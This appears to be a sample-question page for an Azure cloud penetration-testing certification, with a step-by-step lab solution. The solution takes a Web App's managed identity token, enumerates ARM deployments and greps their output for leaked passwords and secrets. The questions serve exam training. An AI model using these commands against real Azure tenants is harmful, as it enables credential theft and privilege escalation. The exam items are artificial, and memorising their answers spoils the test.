최신The SecOps Group Certified Cloud Pentesting eXpert - Azure - CCPenX-Az무료샘플문제
With access to the Web App's Managed Identity, you can now query certain Azure Resources. Use this access to uncover the hidden secret left behind during provisioning. What is the secret?
Explanation:
The answer is the exposed provisioning secret retrieved from ARM deployment metadata, deployment operations, or App Service configuration. In this lab chain, it should reveal the next user credential, commonly for:
[email protected]
Detailed Solution:
The key point is this: you are no longer only using Alex's user permissions. You must use the Web App managed identity .
From the Web App runtime/Kudu console, request an access token for Azure Resource Manager.
For Linux-style shell:
curl " $IDENTITY_ENDPOINT?api-version=2019-08-01 & resource=https://management.azure.com/ & client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df " \
-H " X-IDENTITY-HEADER: $IDENTITY_HEADER "
For Windows PowerShell inside Kudu:
$uri = " $env:IDENTITY_ENDPOINT?api-version=2019-08-01 & resource=https://management.azure.com/
& client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df "
$response = Invoke-RestMethod -Uri $uri -Headers @{
" X-IDENTITY-HEADER " = $env:IDENTITY_HEADER
}
$token = $response.access_token
Now use the token to query Azure Resource Manager.
$sub = " 7403ec86-c39d-4d80-9efa-35c7580ecefa "
$rg = " Excalibur-Resources "
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/resources?api-version=2021-04-
01 " `
-Headers @{ Authorization = " Bearer $token " }
Next, enumerate ARM deployments.
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
For each deployment name returned, inspect it:
$deploymentName = " < deployment-name > "
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments/$deploymentName?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
Also check deployment operations:
Invoke-RestMethod `
-Uri " https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources
/deployments/$deploymentName/operations?api-version=2021-04-01 " `
-Headers @{ Authorization = " Bearer $token " }
Search the output for fields like:
password
secret
adminPassword
userPassword
credential
sumit
The exposed value is the answer to Q4.
A practical one-liner on Linux would be:
curl -s -H " Authorization: Bearer $TOKEN " \
" https://management.azure.com/subscriptions/7403ec86-c39d-4d80-9efa-35c7580ecefa/resourceGroups
/Excalibur-Resources/providers/Microsoft.Resources/deployments/ < deployment-name > /operations?api- version=2021-04-01 " \
| jq ' .. | strings ' | grep -iE ' password|secret|credential|sumit|flag ' Final answer:
Use the leaked secret/password value returned from the deployment metadata. Do not guess this; it is lab- generated.
Using the managed identity principal ID discovered in the previous task, identify which Azure RBAC role is assigned to it.
During network reconnaissance of an Azure VM, you inspect its Network Security Group. Which inbound rule creates the highest risk?
While exploring the table storage, you've uncovered information that provides limited access to a storage account. Using this access, enumerate the blob containers. Which of the following containers is available?